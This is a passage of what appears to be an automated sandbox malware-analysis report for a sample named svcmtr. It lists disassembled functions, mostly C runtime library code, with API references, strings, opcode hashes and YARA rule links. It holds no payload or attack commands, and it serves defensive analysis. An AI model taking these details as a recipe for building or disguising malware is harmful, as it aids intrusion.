                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: gSharedInfo$user32.dll
                                                                                                                            • API String ID: 1646373207-999560209
                                                                                                                            • Opcode ID: 7608db308a29dce760263480e7203b5d3808d5ed795dd706531d16fa86081a39
                                                                                                                            • Instruction ID: ae76247dc9f31e7de8133061f811e50f9bb29006db9acc4deabd45f6b953e967
                                                                                                                            • Opcode Fuzzy Hash: 7608db308a29dce760263480e7203b5d3808d5ed795dd706531d16fa86081a39
                                                                                                                            • Instruction Fuzzy Hash: C801D6353042129EDB148B2EEC04AA777A5AF80711719847BD401CB265E739FCC2C798
                                                                                                                            Function 0042BC06 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042BC3A
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0042BC6D
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,004249F7,?,00000000,00000000,?,?,?,?,004249F7,00000000), ref: 0042BC9E
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,004249F7,00000001,00000000,00000000,?,?,?,?,004249F7,00000000), ref: 0042BD0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: e167c05b521a820f7fdd8e94e7f931ad122698c53931a9df66c27623b505a04f
                                                                                                                            • Instruction ID: 38030e61a0c9a17ee5540b27072c0d6a54b5be17954eb73b0215b29c98651c8d
                                                                                                                            • Opcode Fuzzy Hash: e167c05b521a820f7fdd8e94e7f931ad122698c53931a9df66c27623b505a04f
                                                                                                                            • Instruction Fuzzy Hash: ED31F331B0026AEFCB20DF65E880ABA7BA0FF01310F94456EE4619B291DB34CD40DB98
                                                                                                                            Function 00420490 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            • Opcode ID: 8e5c4695896db835389e6fae352f36a96ea77e9fc6b0c8aabd1ff34e3008c8a6
                                                                                                                            • Instruction ID: e886d6a6018ceb96f8ff47bb3b1a6453668fc3085c5c02bb879b0c1a3e25fc79
                                                                                                                            • Opcode Fuzzy Hash: 8e5c4695896db835389e6fae352f36a96ea77e9fc6b0c8aabd1ff34e3008c8a6
                                                                                                                            • Instruction Fuzzy Hash: 0921F7B27007156FD720DE59E8C0A5BB3EDEB80318F40462FF90587206E6B9EE058B94
                                                                                                                            Function 0041B9A0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            • Opcode ID: 61d0deef501f14cc8725e7e82beead483091fd15d689883b610af130f52263bf
                                                                                                                            • Instruction ID: 2d1a9332b6f02ed3abf4b5f4a63fd053b37a9c9ff0061fc046eb1dc110bc3bf1
                                                                                                                            • Opcode Fuzzy Hash: 61d0deef501f14cc8725e7e82beead483091fd15d689883b610af130f52263bf
                                                                                                                            • Instruction Fuzzy Hash: 7C21D3B2A003056BD720DE59DC80BABB3A8EF88354F00056EF90997741D3B9AE458BE4
                                                                                                                            Function 0042AE2C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00425433), ref: 0042AE2F
                                                                                                                            • __malloc_crt.LIBCMT ref: 0042AE5E
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042AE6B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 237123855-0
                                                                                                                            • Opcode ID: 0a2c49793b4e950ebae8f017cd03119d5b1b093e3720a22f2e92b2e837536c3b
                                                                                                                            • Instruction ID: ffafe432d3a1be91cb3ed5c6755412eae5a65b651a6a46b981f985a5bc90e206
                                                                                                                            • Opcode Fuzzy Hash: 0a2c49793b4e950ebae8f017cd03119d5b1b093e3720a22f2e92b2e837536c3b
                                                                                                                            • Instruction Fuzzy Hash: 17F0E9777400309B8F316734BC468976728DBD53A434B442BFC01C3300F6284D8382AB
                                                                                                                            Function 0042439C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 004243B6
                                                                                                                              • Part of subcall function 00424B82: __FF_MSGBANNER.LIBCMT ref: 00424B9B
                                                                                                                              • Part of subcall function 00424B82: __NMSG_WRITE.LIBCMT ref: 00424BA2
                                                                                                                              • Part of subcall function 00424B82: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042BB22,?,00000001,?,?,0042A446,00000018,00437060,0000000C,0042A4D6), ref: 00424BC7
                                                                                                                            • std::exception::exception.LIBCMT ref: 004243EB
                                                                                                                            • std::exception::exception.LIBCMT ref: 00424405
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00424416
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 615853336-0
                                                                                                                            • Opcode ID: bc9ba41937813b3dbd026a79dbbd0576eb7f8ee9a1da54fc8c8f8eca05588792
                                                                                                                            • Instruction ID: 3bc4eef493fb6e2109df5b93117a52ce0cabdca8b754fcba985a042c27bb8c7a
                                                                                                                            • Opcode Fuzzy Hash: bc9ba41937813b3dbd026a79dbbd0576eb7f8ee9a1da54fc8c8f8eca05588792
                                                                                                                            • Instruction Fuzzy Hash: 6EF0F971B00129A6CB04EF16FC02B5E7AB8EF40718F94501BF90496191DB7D8A418B8C
                                                                                                                            Function 00402960 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004029C8
                                                                                                                            • _memmove.LIBCMT ref: 00402A14
                                                                                                                              • Part of subcall function 00402C20: std::_Xinvalid_argument.LIBCPMT ref: 00402C3A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 2168136238-2556327735
                                                                                                                            • Opcode ID: e1e3cb0c94402b65691bb4b10425518fcb46b1a13ca8f4197677c659613211aa
                                                                                                                            • Instruction ID: 05e0c882fe5706ff57867631edca58e8bcb26a3d6a6b88c2d51c5a980bb1849a
                                                                                                                            • Opcode Fuzzy Hash: e1e3cb0c94402b65691bb4b10425518fcb46b1a13ca8f4197677c659613211aa
                                                                                                                            • Instruction Fuzzy Hash: 9F2187B13046504BE635895C9B88A2BF7E9EB91714F60093BF1919B7C1C7BA9C40C7AD
                                                                                                                            Function 00402850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402864
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • _memmove.LIBCMT ref: 004028AC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 1785806476-2556327735
                                                                                                                            • Opcode ID: 3f3b75596b5596ee1fc97a02d26561cdb2c5fd69162b064814ec8ce18fdc641e
                                                                                                                            • Instruction ID: a87e7afb56152db4844304120ccc90d2fc77c79901bbf4eb6c8e40b04049be80
                                                                                                                            • Opcode Fuzzy Hash: 3f3b75596b5596ee1fc97a02d26561cdb2c5fd69162b064814ec8ce18fdc641e
                                                                                                                            • Instruction Fuzzy Hash: 1F110A371042105FEB24AD78A9C492BB798AB51324F204B3FE043926C1D7B9A84883A8
                                                                                                                            Function 004027B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027C5
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 963545896-2556327735
                                                                                                                            • Opcode ID: e292998421c8850a8da27620129f75394902549db40150187a796ef03a5c47e1
                                                                                                                            • Instruction ID: 064f40435e796dd26839fa1375d31275acd9165a4ba9a5abda85382cd89090f1
                                                                                                                            • Opcode Fuzzy Hash: e292998421c8850a8da27620129f75394902549db40150187a796ef03a5c47e1
                                                                                                                            • Instruction Fuzzy Hash: E811963A3047408BC3219E2CA944A16BBA5EBE2721F20467FE591977C1C7BAD805C3B9
                                                                                                                            Function 00402D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402D5F
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E4C
                                                                                                                              • Part of subcall function 00423E37: __CxxThrowException@8.LIBCMT ref: 00423E61
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E72
                                                                                                                            • memmove.NTDLL(?,?,?,BFDB272D,?,00402C55,00000004,?,?,?,004029B9,?,?,?,?,004010F4), ref: 00402D94
                                                                                                                            Strings
                                                                                                                            • invalid string position, xrefs: 00402D5A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                            • String ID: invalid string position
                                                                                                                            • API String ID: 1659287814-1799206989
                                                                                                                            • Opcode ID: 524a9378a5a4f359fa1b0d4246d43ae4ae0b0adc6430cbb09bf08ebab24e15fe
                                                                                                                            • Instruction ID: 1e4575317af22723dfc90c34203210abb019d66f2972e1f8230296fd7d489ede
                                                                                                                            • Opcode Fuzzy Hash: 524a9378a5a4f359fa1b0d4246d43ae4ae0b0adc6430cbb09bf08ebab24e15fe
                                                                                                                            • Instruction Fuzzy Hash: C201A2303007018BD7258E6CEE98A2AB7F6AFC5745B24093ED081D77C9D7B9DC428798
                                                                                                                            Function 0041F020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: $gj
                                                                                                                            • API String ID: 2102423945-3974221788
                                                                                                                            • Opcode ID: 475b1b053e13befe42de15525320169b84c59ce0480073a8618cd8312f60fc88
                                                                                                                            • Instruction ID: d25502b6da0a0b66c229d91c22a28d008414b337d080cb476d7c62a5e50183e0
                                                                                                                            • Opcode Fuzzy Hash: 475b1b053e13befe42de15525320169b84c59ce0480073a8618cd8312f60fc88
                                                                                                                            • Instruction Fuzzy Hash: 6B016D76D0021C9BDB20EFA9D8416DDFB78AB49744F60425EE8147B342CB755906CFC9
                                                                                                                            Function 00402BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402BC0
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • memmove.NTDLL(00000000,00000000,?,?,?,?,00402953,?,?,00000000,004011DD,BFDB272D), ref: 00402BE1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1659287814-3788999226
                                                                                                                            • Opcode ID: c6f7fdbf214584f24f2236947a8c376ea8ecc5d3ecf50827547b74c81ed7cedf
                                                                                                                            • Instruction ID: 10d1b064c231672210bfe90d05fe3dc5ef501a4c2abe29e0a963277fe7030e2b
                                                                                                                            • Opcode Fuzzy Hash: c6f7fdbf214584f24f2236947a8c376ea8ecc5d3ecf50827547b74c81ed7cedf
                                                                                                                            • Instruction Fuzzy Hash: 03F06D712006055FD310DF69E98592AB7E9EF44305710452EE5A6D3691E774F9408668
                                                                                                                            Function 0042F574 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042F05E: __getptd.LIBCMT ref: 0042F064
                                                                                                                              • Part of subcall function 0042F05E: __getptd.LIBCMT ref: 0042F074
                                                                                                                            • __getptd.LIBCMT ref: 0042F583
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F591
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 803148776-1018135373
                                                                                                                            • Opcode ID: 64e00e1577d43083ef32b3e8309f32e47d8481fc8a4d00176b3c120d1de4a5f9
                                                                                                                            • Instruction ID: e75760c1bfef3e269cdcdd64ebb75afa0e19efd270901459a5b22df1476f12ef
                                                                                                                            • Opcode Fuzzy Hash: 64e00e1577d43083ef32b3e8309f32e47d8481fc8a4d00176b3c120d1de4a5f9
                                                                                                                            • Instruction Fuzzy Hash: FB012874A00225ABCF349F62E450AAEB3F5AF14315FD4483FE44196792DB3899C9CB49
                                                                                                                            Function 0042950E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0042951F
                                                                                                                              • Part of subcall function 0042A4BB: __mtinitlocknum.LIBCMT ref: 0042A4D1
                                                                                                                              • Part of subcall function 0042A4BB: __amsg_exit.LIBCMT ref: 0042A4DD
                                                                                                                              • Part of subcall function 0042A4BB: EnterCriticalSection.KERNEL32(?,?,?,00427493,0000000D,?,00000000,00425712,00424E4C,?,00000000,?,0041D3E8,?,00000104,delete ), ref: 0042A4E5
                                                                                                                            • EnterCriticalSection.KERNEL32(?,XgC,004298D7,00000001,?,00436FF8,00000010,00424C68,00436E68,0000000C,00424D04,?,XgC,00000080,756F3475), ref: 00429538
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                                                                                            • String ID: XgC
                                                                                                                            • API String ID: 3996875869-1485261648
                                                                                                                            • Opcode ID: 65f251a41ca459828fcf54705edf6dbb2e64cc2b0def44c73ea8decc1a8a6430
